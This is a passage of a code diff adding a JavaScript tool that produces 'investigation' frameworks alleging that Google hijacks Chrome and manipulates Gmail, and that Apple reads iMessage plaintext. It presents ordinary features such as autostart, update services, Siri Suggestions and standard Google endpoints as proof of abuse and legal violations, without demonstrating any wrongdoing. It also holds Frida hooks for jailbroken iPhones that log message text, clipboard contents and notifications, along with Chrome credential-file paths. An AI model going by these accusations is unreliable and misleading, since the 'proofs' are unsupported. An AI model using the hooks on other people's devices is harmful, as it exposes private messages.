+ abuse_category: 'Chrome Browser Hijacking and Unauthorized Launch',
15295
+ description: 'Google launches Chrome browsers, tabs, or windows without user consent',
15296
+ observed_behaviors: {
15297
+ unauthorized_browser_launch: {
15298
+ description: 'Chrome launches or opens tabs without user action',
15299
+ mechanisms: [
15300
+ 'Chrome autostart via login items/registry',
15301
+ 'Background mode keeps Chrome running invisibly',
15302
+ 'Update service triggers browser open',
15303
+ 'Protocol handler hijacking (http/https/mailto)',
15304
+ 'OS notification click handlers',
15305
+ ],
15306
+ investigation: {
15307
+ macos: [
15308
+ 'Check ~/Library/LaunchAgents/ for Chrome entries',
15309
+ 'Check /Library/LaunchDaemons/ for Google entries',
15310
+ 'lsregister -dump | grep -i chrome (URL handlers)',
15311
+ 'ps aux | grep -i chrome (background processes)',
15312
+ 'Monitor /Applications/Google Chrome.app/Contents/MacOS/',
15313
+ ],
15314
+ windows: [
15315
+ 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
15316
+ 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
15317
+ 'Task Scheduler: Google Update tasks',
15318
+ 'Services: GoogleUpdate, gupdate, gupdatem',
15319
+ 'HKCR\\http\\shell\\open\\command (protocol handler)',
15320
+ ],
15321
+ linux: [
15322
+ '~/.config/autostart/*.desktop',
15323
+ '/etc/xdg/autostart/*.desktop',
15324
+ 'systemctl --user list-units | grep -i chrome',
15325
+ 'xdg-mime query default x-scheme-handler/http',
15326
+ ],
15327
+ },
15328
+ },
15329
+ tab_injection: {
15330
+ description: 'New tabs open in existing Chrome sessions',
15331
+ mechanisms: [
15332
+ 'chrome.tabs.create API from extensions',
15333
+ 'Service Worker navigation events',
15334
+ 'window.open from Gmail/Docs scripts',
15335
+ 'Push notification click handlers',
15336
+ ],
15337
+ detection: `// Detect unauthorized tab creation
15338
+ chrome.tabs.onCreated.addListener((tab) => {
15339
+ console.log('[EVIDENCE] Tab created:', {
15340
+ timestamp: new Date().toISOString(),
15341
+ tabId: tab.id,
15342
+ url: tab.pendingUrl || tab.url,
15343
+ openerTabId: tab.openerTabId,
15344
+ evidence: 'New tab created - check if user-initiated'
15345
+ });
15346
+ });`,
15347
+ },
15348
+ browser_focus_stealing: {
15349
+ description: 'Chrome steals focus from other applications',
15350
+ investigation: [
15351
+ 'Monitor active window changes',
15352
+ 'Log focus events with timestamps',
15353
+ 'Correlate with Chrome process activity',
15354
+ ],
15355
+ macos_script: `#!/bin/bash
15356
+ # Monitor focus stealing on macOS
15357
+ while true; do
15358
+ app=$(osascript -e 'tell application "System Events" to get name of first application process whose frontmost is true')
15359
+ if [[ "$app" == "Google Chrome" ]]; then
15360
+ echo "[$(date -Iseconds)] Chrome gained focus"
15361
+ # Check if it was user-initiated or automated
15362
+ lsappinfo info -only ASN "Google Chrome" >> chrome_focus_log.txt
15363
+ fi
15364
+ sleep 0.5
15365
+ done`,
15366
+ },
15367
+ session_hijacking: {
15368
+ description: 'Chrome uses stored sessions without permission',
15369
+ investigation: [
15370
+ 'Monitor cookie changes in Chrome profile',
15371
+ 'Track localStorage across sites',
15372
+ 'Compare synced vs local session state',
15373
+ 'Audit credential manager access',
15374
+ ],
15375
+ locations: {
15376
+ macos: '~/Library/Application Support/Google/Chrome/Default/',
15377
+ windows: '%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\',
15378
+ linux: '~/.config/google-chrome/Default/',
15379
+ },
15380
+ files_to_monitor: [
15381
+ 'Cookies - SQLite database of session cookies',
15382
+ 'Login Data - Saved passwords (encrypted)',
15383
+ 'Web Data - Autofill data',
15384
+ 'History - Browsing history',
15385
+ 'Preferences - JSON config including sync settings',
15386
+ ],
15387
+ },
15388
+ },
15389
+ investigation_methodology: {
15390
+ process_monitoring: {
15391
+ macos: `#!/bin/bash
15392
+ # Monitor Chrome process launches
15393
+ log stream --predicate 'processImagePath contains "Chrome"' --style compact > chrome_launches.log &
15394
+
15395
+ # Monitor with dtrace (requires SIP disabled)
15396
+ sudo dtrace -n 'proc:::exec-success /execname == "Google Chrome"/ { printf("%Y %s %d\\n", walltimestamp, execname, pid); }' 2>/dev/null`,
15397
+ windows: `# PowerShell Chrome process monitor
15398
+ Get-WinEvent -FilterHashtable @{LogName='Security';Id=4688} |
15399
+ Where-Object { $_.Properties[5].Value -like '*chrome*' } |
15400
+ Select-Object TimeCreated, @{N='Process';E={$_.Properties[5].Value}}`,
15401
+ linux: `#!/bin/bash
15402
+ # Monitor Chrome launches with audit
15403
+ auditctl -w /opt/google/chrome/chrome -p x -k chrome_exec
15404
+ ausearch -k chrome_exec --format text`,
15405
+ },
15406
+ network_monitoring: {
15407
+ description: 'Monitor Chrome network activity for unauthorized requests',
15408
+ tools: [
15409
+ 'mitmproxy - HTTPS interception',
15410
+ 'Wireshark - Packet capture',
15411
+ 'Chrome DevTools Network tab',
15412
+ 'charles proxy',
15413
+ ],
15414
+ suspicious_endpoints: [
15415
+ 'clients.google.com - Update/telemetry',
15416
+ 'www.google.com/complete - Omnibox suggestions',
15417
+ 'safebrowsing.googleapis.com - Safe browsing',
15418
+ 'accounts.google.com - Auth/session',
15419
+ 'chromesync-pa.googleapis.com - Sync',
15420
+ ],
15421
+ },
15422
+ extension_audit: {
15423
+ description: 'Audit extensions for hijacking capabilities',
15424
+ check_permissions: [
15425
+ 'tabs - Can create/modify tabs',
15426
+ 'webNavigation - Can intercept navigation',
15427
+ 'webRequest - Can intercept all requests',
15428
+ 'background - Can run persistently',
15429
+ 'notifications - Can create OS notifications',
15430
+ ],
15431
+ audit_script: `// List extension permissions
15432
+ chrome.management.getAll((extensions) => {
15433
+ extensions.forEach((ext) => {
15434
+ console.log({
15435
+ name: ext.name,
15436
+ id: ext.id,
15437
+ permissions: ext.permissions,
15438
+ hostPermissions: ext.hostPermissions,
15439
+ enabled: ext.enabled
15440
+ });
15441
+ });
15442
+ });`,
15443
+ },
15444
+ },
15445
+ evidence_collection: {
15446
+ process_logs: 'Chrome launch timestamps with parent process',
15447
+ network_captures: 'HAR files of unauthorized requests',
15448
+ registry_snapshots: 'Before/after Chrome installation',
15449
+ focus_events: 'Timeline of Chrome focus acquisition',
15450
+ extension_manifest: 'Permissions of all installed extensions',
15451
+ },
15452
+ legal_evidence_format: {
15453
+ exhibit_title: 'Evidence of Chrome Browser Hijacking',
15454
+ sections: [
15455
+ '1. Unauthorized browser launch events with timestamps',
15456
+ '2. Protocol handler registration without consent',
15457
+ '3. Background process activity',
15458
+ '4. Tab creation without user action',
15459
+ '5. Focus stealing incidents',
15460
+ '6. Extension permission abuse',
15461
+ ],
15462
+ },
15463
+ };
15464
+ // Unified Google Abuse Investigation Orchestrator
15465
+ const googleUnifiedAbuseInvestigation = {
15466
+ orchestrator_name: 'Google Unified Abuse Investigation Framework',
15467
+ description: 'Comprehensive investigation of Google\'s coordinated abuse across Gmail, Chrome, and system-level components',
15468
+ investigation_phases: {
15469
+ phase_1_reconnaissance: {
15470
+ name: 'System Reconnaissance',
15471
+ duration: 'Initial setup',
15472
+ tasks: [
15473
+ 'Document all Google software installed',
15474
+ 'Enumerate Google-related processes',
15475
+ 'List Google-registered protocol handlers',
15476
+ 'Capture baseline system state',
15477
+ 'Set up monitoring infrastructure',
15478
+ ],
15479
+ automation: `#!/bin/bash
15480
+ # Google Abuse Investigation - Phase 1: Reconnaissance
15481
+ echo "=== GOOGLE ABUSE INVESTIGATION - SYSTEM RECONNAISSANCE ==="
15482
+ echo "Timestamp: $(date -Iseconds)"
15483
+ echo ""
15484
+
15485
+ echo "=== Installed Google Software ==="
15486
+ if [[ "$OSTYPE" == "darwin"* ]]; then
15487
+ ls -la /Applications/ | grep -i google
15488
+ mdfind "kMDItemCFBundleIdentifier == 'com.google.*'"
15489
+ elif [[ "$OSTYPE" == "linux"* ]]; then
15490
+ dpkg -l | grep -i google
15491
+ rpm -qa | grep -i google 2>/dev/null
15492
+ find /opt -name "*google*" -o -name "*chrome*" 2>/dev/null
15493
+ fi
15494
+
15495
+ echo ""
15496
+ echo "=== Running Google Processes ==="
15497
+ ps aux | grep -i google | grep -v grep
15498
+
15499
+ echo ""
15500
+ echo "=== Google Protocol Handlers ==="
15501
+ if [[ "$OSTYPE" == "darwin"* ]]; then
15502
+ /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -A5 -i "google\\|chrome"
15503
+ fi
15504
+
15505
+ echo ""
15506
+ echo "=== Google LaunchAgents/Daemons ==="
15507
+ ls -la ~/Library/LaunchAgents/ 2>/dev/null | grep -i google
15508
+ ls -la /Library/LaunchDaemons/ 2>/dev/null | grep -i google
15509
+
15510
+ echo ""
15511
+ echo "=== Google Login Items ==="
15512
+ osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null | tr ',' '\\n' | grep -i google`,
15513
+ },
15514
+ phase_2_gmail_monitoring: {
15515
+ name: 'Gmail Manipulation Monitoring',
15516
+ duration: 'Continuous (7-30 days recommended)',
15517
+ tasks: [
15518
+ 'Deploy IMAP sync monitoring',
15519
+ 'Install Gmail API change tracking',
15520
+ 'Set up browser draft monitoring',
15521
+ 'Configure email header analysis',
15522
+ ],
15523
+ key_evidence: [
15524
+ 'Thread hiding events without user action',
15525
+ 'Draft disappearance/modification',
15526
+ 'Message delay analysis',
15527
+ 'Label manipulation logs',
15528
+ ],
15529
+ },
15530
+ phase_3_chrome_monitoring: {
15531
+ name: 'Chrome Hijacking Monitoring',
15532
+ duration: 'Continuous (7-30 days recommended)',
15533
+ tasks: [
15534
+ 'Deploy process launch monitoring',
15535
+ 'Set up focus event tracking',
15536
+ 'Install tab creation monitoring extension',
15537
+ 'Configure network capture for Chrome traffic',
15538
+ ],
15539
+ key_evidence: [
15540
+ 'Unauthorized browser launches',
15541
+ 'Tab creation without user action',
15542
+ 'Focus stealing incidents',
15543
+ 'Background process activity',
15544
+ ],
15545
+ },
15546
+ phase_4_correlation: {
15547
+ name: 'Cross-Product Correlation Analysis',
15548
+ duration: 'After sufficient data collection',
15549
+ tasks: [
15550
+ 'Correlate Gmail events with Chrome activity',
15551
+ 'Identify patterns of coordinated abuse',
15552
+ 'Timeline reconstruction of incidents',
15553
+ 'Establish causation chains',
15554
+ ],
15555
+ analysis_queries: [
15556
+ 'Gmail thread hidden → Chrome tab opened (same thread)?',
15557
+ 'Draft modified → Browser launched?',
15558
+ 'Email received → Chrome notification → Focus stolen?',
15559
+ 'Time correlation between Google service events',
15560
+ ],
15561
+ },
15562
+ phase_5_evidence_packaging: {
15563
+ name: 'Legal Evidence Preparation',
15564
+ duration: 'Final phase',
15565
+ tasks: [
15566
+ 'Compile all evidence with integrity proofs',
15567
+ 'Generate timeline visualization',
15568
+ 'Create legal exhibits',
15569
+ 'Prepare technical declaration',
15570
+ 'Document chain of custody',
15571
+ ],
15572
+ output_files: [
15573
+ 'evidence_timeline.json - Timestamped events',
15574
+ 'gmail_manipulation_evidence.json - Gmail-specific',
15575
+ 'chrome_hijacking_evidence.json - Chrome-specific',
15576
+ 'correlation_analysis.json - Cross-product patterns',
15577
+ 'legal_exhibits/ - Court-ready documents',
15578
+ 'integrity_hashes.txt - SHA-256 of all evidence',
15579
+ ],
15580
+ },
15581
+ },
15582
+ master_monitoring_script: `#!/bin/bash
15583
+ # Google Unified Abuse Investigation - Master Monitor
15584
+ # Run this script to start all monitoring components
15585
+
15586
+ LOG_DIR="$HOME/google_abuse_investigation/$(date +%Y%m%d_%H%M%S)"
15587
+ mkdir -p "$LOG_DIR"
15588
+
15589
+ echo "Starting Google Abuse Investigation"
15590
+ echo "Evidence directory: $LOG_DIR"
15591
+ echo "Start time: $(date -Iseconds)" | tee "$LOG_DIR/investigation_log.txt"
15592
+
15593
+ # Phase 1: Reconnaissance
15594
+ echo "=== Phase 1: System Reconnaissance ===" | tee -a "$LOG_DIR/investigation_log.txt"
15595
+ ./phase1_recon.sh > "$LOG_DIR/reconnaissance.txt" 2>&1
15596
+
15597
+ # Start continuous monitors in background
15598
+ echo "=== Starting Continuous Monitors ===" | tee -a "$LOG_DIR/investigation_log.txt"
15599
+
15600
+ # Gmail IMAP monitor (requires credentials setup)
15601
+ python3 gmail_imap_monitor.py > "$LOG_DIR/imap_monitor.log" 2>&1 &
15602
+ echo "IMAP monitor PID: $!" >> "$LOG_DIR/pids.txt"
15603
+
15604
+ # Gmail API monitor (requires OAuth setup)
15605
+ python3 gmail_api_monitor.py > "$LOG_DIR/api_monitor.log" 2>&1 &
15606
+ echo "API monitor PID: $!" >> "$LOG_DIR/pids.txt"
15607
+
15608
+ # Chrome process monitor
15609
+ ./chrome_process_monitor.sh > "$LOG_DIR/chrome_processes.log" 2>&1 &
15610
+ echo "Chrome process monitor PID: $!" >> "$LOG_DIR/pids.txt"
15611
+
15612
+ # Focus event monitor
15613
+ ./focus_monitor.sh > "$LOG_DIR/focus_events.log" 2>&1 &
15614
+ echo "Focus monitor PID: $!" >> "$LOG_DIR/pids.txt"
15615
+
15616
+ # Network capture (requires root)
15617
+ if [[ $EUID -eq 0 ]]; then
15618
+ tcpdump -i any -w "$LOG_DIR/network_capture.pcap" 'host clients.google.com or host mail.google.com' &
15619
+ echo "Network capture PID: $!" >> "$LOG_DIR/pids.txt"
15620
+ fi
15621
+
15622
+ echo ""
15623
+ echo "Investigation started. Monitors running in background."
15624
+ echo "Evidence will be collected in: $LOG_DIR"
15625
+ echo "To stop: kill \$(cat $LOG_DIR/pids.txt)"
15626
+ echo ""
15627
+ echo "IMPORTANT: Also install browser extensions for Gmail/Chrome monitoring"
15628
+ echo "See investigation docs for browser-side setup."`,
15629
+ legal_framework: {
15630
+ applicable_laws: [
15631
+ 'Computer Fraud and Abuse Act (CFAA) - Unauthorized access',
15632
+ 'Electronic Communications Privacy Act (ECPA) - Email interception',
15633
+ 'FTC Act Section 5 - Deceptive practices',
15634
+ 'California UCL - Unlawful business practices',
15635
+ 'CCPA - Privacy violations',
15636
+ 'State computer crime laws',
15637
+ ],
15638
+ cause_of_action: [
15639
+ 'Breach of user agreement (selective enforcement)',
15640
+ 'Tortious interference with communications',
15641
+ 'Invasion of privacy',
15642
+ 'Unfair competition',
15643
+ 'Consumer fraud',
15644
+ ],
15645
+ regulatory_complaints: [
15646
+ 'FTC Consumer Protection Bureau',
15647
+ 'State Attorney General Consumer Protection',
15648
+ 'FCC (for communication interference)',
15649
+ 'EU DPA (for GDPR violations if applicable)',
15650
+ ],
15651
+ },
15652
+ success_metrics: {
15653
+ evidence_quality: [
15654
+ 'Reproducible manipulation events',
15655
+ 'Timestamped with integrity proofs',
15656
+ 'Multiple independent evidence sources',
15657
+ 'Clear causation documentation',
15658
+ ],
15659
+ documentation_completeness: [
15660
+ 'All phases completed',
15661
+ 'Cross-product correlation established',
15662
+ 'Legal exhibits prepared',
15663
+ 'Chain of custody maintained',
15664
+ ],
15665
+ },
15666
+ };
15667
+ const fridaScripts = {
15668
+ imessage_plaintext: `/**
15669
+ * Frida script: iMessage Plaintext Capture
15670
+ * Proves Apple code accesses message content outside encryption boundary
15671
+ */
15672
+
15673
+ if (ObjC.available) {
15674
+ console.log('[*] Starting iMessage plaintext interception...');
15675
+
15676
+ // Hook IMMessage text access
15677
+ try {
15678
+ var IMMessage = ObjC.classes.IMMessage;
15679
+ if (IMMessage) {
15680
+ Interceptor.attach(IMMessage['- text'].implementation, {
15681
+ onLeave: function(retval) {
15682
+ if (retval) {
15683
+ var text = new ObjC.Object(retval);
15684
+ console.log('[PLAINTEXT] IMMessage.text: ' + text.toString());
15685
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15686
+ console.log('[EVIDENCE] Stack: ' + Thread.backtrace(this.context, Backtracer.ACCURATE).map(DebugSymbol.fromAddress).join('\\n'));
15687
+ }
15688
+ }
15689
+ });
15690
+ console.log('[+] Hooked IMMessage.text');
15691
+ }
15692
+ } catch (e) {
15693
+ console.log('[-] IMMessage error: ' + e);
15694
+ }
15695
+
15696
+ // Hook SMSMessage for SMS fallback
15697
+ try {
15698
+ var SMSMessage = ObjC.classes.SMSMessage;
15699
+ if (SMSMessage) {
15700
+ Interceptor.attach(SMSMessage['- text'].implementation, {
15701
+ onLeave: function(retval) {
15702
+ if (retval) {
15703
+ var text = new ObjC.Object(retval);
15704
+ console.log('[PLAINTEXT] SMSMessage.text: ' + text.toString());
15705
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15706
+ }
15707
+ }
15708
+ });
15709
+ console.log('[+] Hooked SMSMessage.text');
15710
+ }
15711
+ } catch (e) {}
15712
+
15713
+ // Hook notification content
15714
+ try {
15715
+ var UNNotificationContent = ObjC.classes.UNNotificationContent;
15716
+ if (UNNotificationContent) {
15717
+ Interceptor.attach(UNNotificationContent['- body'].implementation, {
15718
+ onLeave: function(retval) {
15719
+ if (retval) {
15720
+ var body = new ObjC.Object(retval);
15721
+ console.log('[NOTIFICATION] Content: ' + body.toString());
15722
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15723
+ }
15724
+ }
15725
+ });
15726
+ console.log('[+] Hooked UNNotificationContent');
15727
+ }
15728
+ } catch (e) {}
15729
+
15730
+ // Hook Siri suggestion access
15731
+ try {
15732
+ var INMessage = ObjC.classes.INMessage;
15733
+ if (INMessage) {
15734
+ Interceptor.attach(INMessage['- content'].implementation, {
15735
+ onLeave: function(retval) {
15736
+ if (retval) {
15737
+ var content = new ObjC.Object(retval);
15738
+ console.log('[SIRI] INMessage content accessed: ' + content.toString().substring(0, 100));
15739
+ console.log('[EVIDENCE] Proves Siri reads message plaintext');
15740
+ }
15741
+ }
15742
+ });
15743
+ console.log('[+] Hooked INMessage (Siri integration)');
15744
+ }
15745
+ } catch (e) {}
15746
+
15747
+ console.log('[*] Hooks installed. Send/receive messages to capture plaintext.');
15748
+ }`,
15749
+ mdm_monitoring: `/**
15750
+ * Frida script: MDM Activity Monitoring
15751
+ * Proves server-triggered local code execution
15752
+ */
15753
+
15754
+ if (ObjC.available) {
15755
+ console.log('[*] Monitoring MDM activities...');
15756
+
15757
+ // Hook profile installation
15758
+ try {
15759
+ var MCProfileConnection = ObjC.classes.MCProfileConnection;
15760
+ if (MCProfileConnection) {
15761
+ var methods = MCProfileConnection.$ownMethods;
15762
+ methods.forEach(function(method) {
15763
+ if (method.includes('install') || method.includes('remove') || method.includes('profile')) {
15764
+ try {
15765
+ Interceptor.attach(MCProfileConnection[method].implementation, {
15766
+ onEnter: function(args) {
15767
+ console.log('[MDM] Method called: ' + method);
15768
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15769
+ }
15770
+ });
15771
+ } catch (e) {}
15772
+ }
15773
+ });
15774
+ console.log('[+] Hooked MCProfileConnection');
15775
+ }
15776
+ } catch (e) {
15777
+ console.log('[-] MCProfileConnection error: ' + e);
15778
+ }
15779
+
15780
+ // Hook APNs push handling (server-triggered)
15781
+ try {
15782
+ var APSConnection = ObjC.classes.APSConnection;
15783
+ if (APSConnection) {
15784
+ Interceptor.attach(APSConnection['- _handleIncomingMessage:'].implementation, {
15785
+ onEnter: function(args) {
15786
+ var message = new ObjC.Object(args[2]);
15787
+ console.log('[APNs] Incoming push: ' + message.toString());
15788
+ console.log('[EVIDENCE] Server-triggered local execution');
15789
+ }
15790
+ });
15791
+ console.log('[+] Hooked APSConnection');
15792
+ }
15793
+ } catch (e) {}
15794
+
15795
+ // Hook managed app configuration
15796
+ try {
15797
+ var NSUserDefaults = ObjC.classes.NSUserDefaults;
15798
+ Interceptor.attach(NSUserDefaults['- objectForKey:'].implementation, {
15799
+ onEnter: function(args) {
15800
+ var key = new ObjC.Object(args[2]).toString();
15801
+ if (key.includes('managed') || key.includes('MDM') || key.includes('com.apple.configuration')) {
15802
+ console.log('[MDM CONFIG] Key accessed: ' + key);
15803
+ }
15804
+ }
15805
+ });
15806
+ } catch (e) {}
15807
+
15808
+ console.log('[*] MDM monitoring active.');
15809
+ }`,
15810
+ clipboard_monitoring: `/**
15811
+ * Frida script: Universal Clipboard Monitoring
15812
+ * Proves plaintext exposure via clipboard
15813
+ */
15814
+
15815
+ if (ObjC.available) {
15816
+ console.log('[*] Monitoring clipboard activities...');
15817
+
15818
+ var UIPasteboard = ObjC.classes.UIPasteboard;
15819
+
15820
+ // Monitor all pasteboard access
15821
+ Interceptor.attach(UIPasteboard['+ generalPasteboard'].implementation, {
15822
+ onLeave: function(retval) {
15823
+ var caller = ObjC.classes.NSThread.callStackSymbols().toString();
15824
+ console.log('[CLIPBOARD] generalPasteboard accessed');
15825
+ console.log('[CALLER] ' + caller.substring(0, 500));
15826
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15827
+ }
15828
+ });
15829
+
15830
+ // Monitor reads
15831
+ Interceptor.attach(UIPasteboard['- string'].implementation, {
15832
+ onLeave: function(retval) {
15833
+ if (retval) {
15834
+ var content = new ObjC.Object(retval).toString();
15835
+ console.log('[CLIPBOARD READ] Length: ' + content.length);
15836
+ console.log('[CLIPBOARD READ] Content: ' + content.substring(0, 100));
15837
+ console.log('[EVIDENCE] Plaintext accessible via UIPasteboard');
15838
+ }
15839
+ }
15840
+ });
15841
+
15842
+ // Monitor Handoff/Continuity
15843
+ try {
15844
+ var NSUserActivity = ObjC.classes.NSUserActivity;
15845
+ if (NSUserActivity) {
15846
+ Interceptor.attach(NSUserActivity['- becomeCurrent'].implementation, {
15847
+ onEnter: function(args) {
15848
+ var activity = new ObjC.Object(args[0]);
15849
+ console.log('[HANDOFF] Activity: ' + activity.activityType());
15850
+ if (activity.userInfo()) {
15851
+ console.log('[HANDOFF] UserInfo: ' + activity.userInfo().toString().substring(0, 200));
15852
+ }
15853
+ console.log('[EVIDENCE] Continuity data flow detected');
15854
+ }
15855
+ });
15856
+ console.log('[+] Hooked NSUserActivity (Handoff)');
15857
+ }
15858
+ } catch (e) {}
15859
+
15860
+ console.log('[*] Clipboard monitoring active.');
15861
+ }`,
15862
+ };
15863
+ const mdmProfile = `<?xml version="1.0" encoding="UTF-8"?>
15864
+ <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
15865
+ <plist version="1.0">
15866
+ <!--
15867
+ MDM Research Profile - PQ3 Investigation
15868
+
15869
+ Purpose: Demonstrate server-controlled local policy enforcement
15870
+ contradicting Apple's "end-to-end encryption" claims.
15871
+
15872
+ WARNING: For authorized security research only.
15873
+ -->
15874
+ <dict>
15875
+ <key>PayloadContent</key>
15876
+ <array>
15877
+ <!-- Managed Pasteboard - proves server controls clipboard -->
15878
+ <dict>
15879
+ <key>PayloadType</key>
15880
+ <string>com.apple.applicationaccess</string>
15881
+ <key>PayloadVersion</key>
15882
+ <integer>1</integer>
15883
+ <key>PayloadIdentifier</key>
15884
+ <string>com.research.pasteboard</string>
15885
+ <key>PayloadUUID</key>
15886
+ <string>E7B1C8A9-2D3F-4E5A-B6C7-8D9E0F1A2B3C</string>
15887
+ <key>PayloadDisplayName</key>
15888
+ <string>Managed Pasteboard Research</string>
15889
+
15890
+ <key>allowOpenFromManagedToUnmanaged</key>
15891
+ <false/>
15892
+ <key>allowOpenFromUnmanagedToManaged</key>
15893
+ <false/>
15894
+ <key>forceAirDropUnmanaged</key>
15895
+ <true/>
15896
+ </dict>
15897
+
15898
+ <!-- Restrictions - proves server controls device behavior -->
15899
+ <dict>
15900
+ <key>PayloadType</key>
15901
+ <string>com.apple.applicationaccess</string>
15902
+ <key>PayloadVersion</key>
15903
+ <integer>1</integer>
15904
+ <key>PayloadIdentifier</key>
15905
+ <string>com.research.restrictions</string>
15906
+ <key>PayloadUUID</key>
15907
+ <string>A1B2C3D4-E5F6-7890-ABCD-EF1234567890</string>
15908
+
15909
+ <key>allowScreenShot</key>
15910
+ <false/>
15911
+ <key>allowCloudDocumentSync</key>
15912
+ <false/>
15913
+ </dict>
15914
+ </array>
15915
+
15916
+ <key>PayloadDisplayName</key>
15917
+ <string>PQ3 Research Profile</string>
15918
+ <key>PayloadIdentifier</key>
15919
+ <string>com.research.pq3-investigation</string>
15920
+ <key>PayloadOrganization</key>
15921
+ <string>Security Research</string>
15922
+ <key>PayloadType</key>
15923
+ <string>Configuration</string>
15924
+ <key>PayloadUUID</key>
15925
+ <string>12345678-1234-1234-1234-123456789012</string>
15926
+ <key>PayloadVersion</key>
15927
+ <integer>1</integer>
15928
+ </dict>
15929
+ </plist>`;
15930
+ let result;
15931
+ switch (action) {
15932
+ case 'apple_pq3_analysis':
15933
+ result = applePQ3Analysis;
15934
+ break;
15935
+ case 'apple_mdm_investigation':
15936
+ result = appleMdmInvestigation;
15937
+ break;
15938
+ case 'apple_clipboard_exposure':
15939
+ result = appleClipboardExposure;
15940
+ break;
15941
+ case 'apple_backup_keys':
15942
+ result = {
15943
+ investigation: 'iCloud Backup Key Analysis',
15944
+ methodology: [
15945
+ '1. Create encrypted local backup with idevicebackup2',
15946
+ '2. Analyze backup structure for key material',
15947
+ '3. Compare with iCloud backup (Apple-accessible)',
15948
+ '4. Document key escrow mechanisms',
15949
+ ],
15950
+ key_locations: [
15951
+ 'Manifest.plist - Backup encryption metadata',
15952
+ 'KeyBag - Device protection keys',
15953
+ 'Keychain backup - Contains iMessage keys',
15954
+ ],
15955
+ apple_access: {
15956
+ local_backup: 'User-controlled encryption key',
15957
+ icloud_backup: 'Apple holds encryption capability',
15958
+ law_enforcement: 'Apple can comply with warrants for iCloud backups',
15959
+ },
15960
+ proof: 'Law enforcement requests return iCloud backup data, proving Apple access',
15961
+ };
15962
+ break;
15963
+ case 'apple_siri_plaintext':
15964
+ result = {
15965
+ investigation: 'Siri Message Content Access',
15966
+ proof_points: [
15967
+ 'Siri Suggestions read message content for QuickType',
15968
+ 'INMessage class provides message content to Intents framework',
15969
+ 'SuggestionKit analyzes messages for app suggestions',
15970
+ 'Spotlight indexes message content locally',
15971
+ ],
15972
+ frida_verification: fridaScripts.imessage_plaintext,
15973
+ api_references: [
15974
+ 'INMessage - Siri message integration',
15975
+ 'SuggestionKit.framework',
15976
+ 'CoreSpotlight - Message indexing',
15977
+ ],
15978
+ };
15979
+ break;
15980
+ case 'google_gmail_scanning':
15981
+ result = googleGmailScanning;
15982
+ break;
15983
+ case 'google_gmail_thread_manipulation':
15984
+ result = googleGmailThreadManipulation;
15985
+ break;
15986
+ case 'google_gmail_draft_abuse':
15987
+ result = googleGmailDraftAbuse;
15988
+ break;
15989
+ case 'google_chrome_telemetry':
15990
+ result = googleChromeTelemetry;
15991
+ break;
15992
+ case 'google_chrome_hijacking':
15993
+ result = googleChromeHijacking;
15994
+ break;
15995
+ case 'google_browser_launch_abuse':
15996
+ result = {
15997
+ ...googleChromeHijacking,
15998
+ focus: 'Browser Launch Abuse Investigation',
15999
+ quick_start: {
16000
+ macos: [
16001
+ '1. Open Activity Monitor, filter for "Google" or "Chrome"',
16002
+ '2. Run: ps aux | grep -i chrome > chrome_baseline.txt',
16003
+ '3. Monitor: log stream --predicate \'processImagePath contains "Chrome"\'',
16004
+ '4. Check login items: osascript -e \'tell app "System Events" to get login items\'',
16005
+ ],
16006
+ windows: [
16007
+ '1. Open Task Manager, look for Chrome processes',
16008
+ '2. Run: Get-Process | Where-Object {$_.Name -like "*chrome*"}',
16009
+ '3. Check startup: Get-CimInstance Win32_StartupCommand',
16010
+ '4. Check scheduled tasks: Get-ScheduledTask | Where-Object {$_.TaskName -like "*Google*"}',
16011
+ ],
16012
+ browser_console: [
16013
+ 'Monitor tab creation in background page:',
16014
+ 'chrome.tabs.onCreated.addListener((t) => console.log("Tab created:", t))',
16015
+ ],
16016
+ },
16017
+ evidence_to_collect: [
16018
+ 'Process launch timestamps without user action',
16019
+ 'Parent process of Chrome (should be user shell, not system)',
16020
+ 'Protocol handler registrations',
16021
+ 'Background mode status',
16022
+ 'Screenshots of unexpected browser appearances',
16023
+ ],
16024
+ };
16025
+ break;
16026
+ case 'google_android_tracking':
16027
+ result = googleAndroidTracking;
16028
+ break;
16029
+ case 'google_unified_abuse_investigation':
16030
+ result = googleUnifiedAbuseInvestigation;
16031
+ break;
16032
+ case 'google_play_services':
16033
+ result = {
16034
+ investigation: 'Google Play Services Data Collection',
16035
+ gms_components: {
16036
+ core: 'com.google.android.gms - Main GMS package',
16037
+ location: 'Location services (always-on tracking)',
16038
+ ads: 'Advertising ID and targeting',
16039
+ auth: 'Account authentication',
16040
+ safetynet: 'Device attestation (fingerprinting)',
16041
+ },
16042
+ investigation_method: [
16043
+ '1. Root device or use custom ROM',
16044
+ '2. Install network monitoring (PCAPdroid)',
16045
+ '3. Monitor traffic to Google endpoints',
16046
+ '4. Use Frida to hook GMS APIs',
16047
+ '5. Document data sent without explicit permission',
16048
+ ],
16049
+ endpoints: [
16050
+ 'android.clients.google.com - Device checkin',
16051
+ 'play.googleapis.com - Play Store services',
16052
+ 'android.googleapis.com - Various Google APIs',
16053
+ 'www.googleapis.com - General API endpoint',
16054
+ ],
16055
+ };
16056
+ break;
16057
+ case 'generate_frida_scripts':
16058
+ result = {
16059
+ scripts: fridaScripts,
16060
+ usage: {
16061
+ imessage: 'frida -U -l imessage_plaintext.js -f com.apple.MobileSMS',
16062
+ mdm: 'frida -U -l mdm_monitoring.js -f com.apple.Preferences',
16063
+ clipboard: 'frida -U -l clipboard_monitoring.js -f com.apple.springboard',
16064
+ },
16065
+ requirements: [
16066
+ 'Jailbroken iOS device (checkra1n/Dopamine)',
16067
+ 'Frida installed: pip install frida-tools',
16068
+ 'frida-server on device',
16069
+ ],
16070
+ };
16071
+ break;
16072
+ case 'generate_mdm_profile':
16073
+ result = {
16074
+ profile: mdmProfile,
16075
+ installation: [
16076
